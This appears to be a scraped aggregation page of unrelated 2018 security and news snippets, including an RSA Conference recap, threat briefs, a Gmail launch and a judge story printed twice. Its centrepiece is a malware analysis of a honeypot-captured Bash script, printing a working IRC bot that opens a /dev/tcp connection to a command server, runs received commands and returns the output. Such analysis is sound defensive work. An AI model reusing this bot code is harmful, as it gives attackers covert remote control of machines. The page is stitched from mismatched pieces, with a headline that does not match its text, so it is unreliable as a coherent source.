RSA Conference 2018 Recap: Building a Foundation for Tomorrow’s Cybersecurity

The RSA Conference has gotten bigger and louder — not just because of the clamoring sounds of tens of thousands of attendees, but also due to the din of construction equipment as San Francisco works to rebuild the Moscone Center. Despite all the noise, this year’s attendees heard a number of key themes reverberating loud and clear throughout the conference as experts shared ideas about where the industry is heading and how security professionals can build strong foundations for the future.

WTB: Energetic Bear/Crouching Yeti: attacks on servers

The intelligence in this week’s iteration discuss the following threats: Adblocker Malware, APT28, ARS VBS Loader, Desert Scorpion, DNS Hijacking, Mukstik, PBot, Roaming Mantis, SquirtDanger, Stresspaint, and XiaoBa. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

The Risks of Bio-IoT

Trend Micro has been protecting its customers now for almost 30 years. Over that time our mission has not changed. We still fight every day to make the world a safer place to exchange digital information. However, our messaging has needed to evolve to take account of the ever-changing threat landscape, as well as the evolution in user behavior and customers’ IT infrastructure.

How to Manage an Insecure Employee

When employees lack self-confidence, it can be hard to get them to perform at their best. So how can you help them excel at their job? What kind of coaching should you provide? What’s the best way to boost their self-esteem? And how do you deal with your own frustration around their insecure behavior?

BrandPost: Fireside Chat with Renesas Electronics: Talking Security & Threat Protection for Connected Cars

Connected vehicles are the next major technology innovation disrupting the automotive industry. With 3D mapping, smart device integration, cloud-based services, advanced LAN/CAN networks, and autonomous driving defining the connected car of the future, the cyber risks are enormous. And with IoT devices connecting to the car network to access content and applications, the attack surface is even larger. Integrated security is paramount for the safety and consumer confidence in the connected car.

Tech-Support Scammers Are Ramping Up Attacks, Says Microsoft

Microsoft overnight announced that it received 153,000 reports in 2017 from customers who’d come in contact with tech-support scammers via a cold call, spam, or the web. The reports from customers last year were up 24 percent on 2016, with filings coming from 183 countries. Despite being a well-known fraud, some 15 percent of Microsoft customers who reported incidents lost money. Losses were typically between $200 and $400 each. Tim Helming, Director of Product Management at DomainTools commented below.

Protecting Your Employees’ Home IT From Cyberthreats

Increasingly, corporations are realizing that helping employees protect their home IT reduces risks to the company. Depending on the organization’s policies, employees may work with sensitive data or interact with self-service HR platforms remotely, and securing employees’ home technology is in the best interest of the enterprise.

Cyber Scorecarding Services

Ample evidence exists to underline that shortcomings in a third-parties cyber security posture can have an extremely negative effect on the security integrity of the businesses they connect or partner with. Consequently, there’s been a continuous and frustrated desire for a couple of decades for some kind of independent verification or scorecard mechanism that can help primary organizations validate and quantify the overall security posture of the businesses they must electronically engage with.

Malicious Network Traffic From /bin/bash, (Wed, Apr 25th)

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry.  It’s a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (classic action these days)
  • Changes the password of the user ‘pi’ and adds an SSH key 
  • Changes the DNS resolver configuration and add some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new, it was already spotted in July 2017 but it looks to be slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is the ability to run a simple IRC bot in using Bash commands. No need for a high-level language. Bash has a very interesting feature for years that not many people are aware of. You can generate network flows using standard redirections. By default, a UNIX process has always the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flow. The syntax is /dev/<proto>/>host>/>port>.

That’s the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

eval 'exec 3<>/dev/tcp/$ircserver/6667;' if [[ ! "$?" -eq 0 ]] ; then continue fi eval 'printf "NICK $NICK\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi eval 'printf "USER user 8 * :IRC hi\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then continue fi # Main loop while [ true ]; do eval "read msg_in <&3;" if [[ ! "$?" -eq 0 ]] ; then break fi if [[ "$msg_in" =~ "PING" ]] ; then printf "PONG %s\n" "${msg_in:5}"; eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi sleep 1 eval 'printf "JOIN #biret\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then privmsg_h=$(echo $msg_in| cut -d':' -f 3) privmsg_data=$(echo $msg_in| cut -d':' -f 4) privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1) hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'` sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin` if [[ "$sign" == "$hash" ]] ; then CMD=`echo $privmsg_data | base64 -d -i` RES=`bash -c "$CMD" | base64 -w 0` eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;' if [[ ! "$?" -eq 0 ]] ; then break fi fi fi done

The magic line is the first one which created a new file descriptor (‘3’) that will be used to read/write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated). The result of the command is sent back. 

Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile a Bash with the following directive ‘–enable-net-redirections’. This can be helpful in many cases. Example to grab data from a remote server without external tools:

exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5 cat <&5 exec 5>&-

Say hello to the new Gmail with self-destructing messages, email snoozing and more

Today, Google is launching the biggest revamp of Gmail in years. The company is bringing to the flagship Gmail service many (but not all) of the features it trialed in Inbox for Gmail, and adding a few new ones, too. With those new features, which we first reported earlier this month, the company is also introducing a refreshed design for the service, though if you’ve used Gmail before, you’ll feel right at home.

Judge was supposed to preside over a Pennsylvania couple’s wedding. She called ICE on them instead

If you want to erode the public’s trust in the legal system, making a court house an unsafe place to be, even during what’s supposed to be a joyful occasion, is a great place to start. Just ask Alexander Parker and Krisha Schmick: They went to a courthouse in Pennsylvania, intent on getting married. The pair had known one another since high school and it seemed like the right time. There was just one problem – Alexander’s skin was brown and the judge he and his bride were to stand before was a raging bigot.

Judge was supposed reside over a Pennsylvania couple’s wedding. She called ICE on them instead

If you want to erode the public’s trust in the legal system, making a court house an unsafe place to be, even during what’s supposed to be a joyful occasion, is a great place to start. Just ask Alexander Parker and Krisha Schmick: They went to a courthouse in Pennsylvania, intent on getting married. The pair had known one another since high school and it seemed like the right time. There was just one problem – Alexander’s skin was brown and the judge he and his bride were to stand before was a raging bigot.